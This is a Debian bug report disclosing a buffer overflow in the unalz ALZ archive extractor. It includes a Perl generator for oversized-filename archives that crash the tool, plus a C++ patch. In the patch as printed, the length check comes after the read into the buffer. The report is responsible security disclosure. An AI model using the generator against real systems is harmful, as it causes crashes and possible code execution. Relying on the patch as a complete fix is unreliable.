Subject: unalz: buffer overflow when extracting archives Package: unalz Version: 0.52-1 Severity: grave Justification: user security hole Tags: security patch sarge etch sid
Hello, I have found a buffer overflow security vulnerability in unalz. It occurs when it extracts malicious ALZ archives. I have attached the archives oflow333.alz (for sarge) and oflow1621.alz (for testing and unstable), as well as the program alzgen.pl that generated them and a patch that corrects this issue. It is also possible to upgrade to the latest upstream version 0.53, which also corrects it. // Ulf Härnhammar, Debian Security Audit Project -- System Information: Debian Release: testing/unstable APT prefers testing APT policy: (500, 'testing') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.12-1-686 Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1) Versions of packages unalz depends on: ii libc6 2.3.5-8 GNU C Library: Shared libraries an ii libgcc1 1:4.0.2-2 GCC support library ii libstdc++6 4.0.2-2 The GNU Standard C++ Library v3 unalz recommends no packages. -- no debconf information
oflow333.alz
Description: Binary data
oflow1621.alz
Description: Binary data
#!/usr/bin/perl --
# alzgen
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.
die "usage: $0 <length> <filename>\n" unless @ARGV == 2;
$len = shift;
$lenhi = int($len / 256);
$lenlo = $len - ($lenhi * 256);
$file = shift;
open(OUT, ">$file") or die "can't open file!\n";
print OUT "\x42\x4c\x5a\x01" . # SIG_LOCAL_FILE_HEADER
chr($lenlo) . chr($lenhi) . # filename length
"\x00" x 7 .
'U' x $len;
close OUT or die "can't close file!?!?\n";
--- UnAlz.cpp.old 2004-11-25 07:23:36.000000000 +0100
+++ UnAlz.cpp 2005-11-20 01:04:23.000000000 +0100
@@ -359,6 +359,8 @@
return FALSE;
}
FRead(zipHeader.fileName, zipHeader.head.fileNameLength);
+ if(zipHeader.head.fileNameLength > MAX_PATH - 5)
+ zipHeader.head.fileNameLength = MAX_PATH - 5;
zipHeader.fileName[zipHeader.head.fileNameLength] = (CHAR)NULL;
